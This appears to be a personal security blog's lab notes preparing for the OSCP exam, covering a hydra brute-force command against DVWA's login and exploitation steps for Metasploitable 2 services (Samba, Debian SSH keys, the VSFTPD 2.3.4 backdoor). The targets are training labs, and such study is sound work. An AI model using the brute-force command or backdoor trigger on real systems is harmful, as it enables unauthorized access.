Monday, September 14, 2015

DVWA brute force login with hydra

hydra <IP-Address> -l admin -P /root/scripts/recon_enum/wordlists/passlist http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=5b1c46ae203ccb0dcbf8fc3390e276d2"
Replace <IP-Address> with the target's IP address.

The username is "-l admin". Replace the username as necessary, and if you're using a user list, change the parameter to "-L /path/to/userlist.txt".

Change the PHPSESSID to one you capture with Wireshark, Burp, ZAP, etc when you manually enter a login/password.

Notice the while the request url has is typically "/dvwa/vulnerabilities/brute/?username=user&password=pass&Login=Login", in hydra you need to specify "index.php" between "/brute/" and the "?", and you replace the "?" with ":".

Wednesday, September 9, 2015

Metasploitable 2 Java RMI Server exploit

Metasploitable 2 Java RMI Server Insecure Default Configuration Java Code Execution
Vulnerability details: https://www.exploit-db.com/exploits/17535/

Samba username map script Command Execution

Command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" containing shell meta characters, attackers can execute arbitrary command. No authentication is required to exploit this vulnerability!

Metasploitable2 Walkthrough without Metasploit - PHP 5 2 4 RCE

Exploiting Metasploitable2 Debian PRNG Bruteforce SSH

After my OffSec PWK lab time ran out, I'm working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

Port 22, SSH:
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit https://www.exploit-db.com/exploits/5720/

Note: I had to run this exploit multiple times before it found the right key. I found a blog post that gave Metasploitable2's root key that worked. That key was in the key directory, it works to login, but the exploit wasn't finding it. After some searching I read a blog post about pwnos by g0tM1lk that says sometimes it fails to find the key.

After running this exploit for the third time if finally finds the key and prints the command to run to ssh to Metasploitable2 as root without password.



Exploiting Metasploitable2 without Metasploit - VSFTPD v2.3.4

After my OffSec PWK lab time ran out, I'm working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

On port 21, VSFTPD v2.3.4 is vulnerable to backdoor command execution.

End the username with a smiley ":)" and input any password and then connect to port 6200 for a root shell.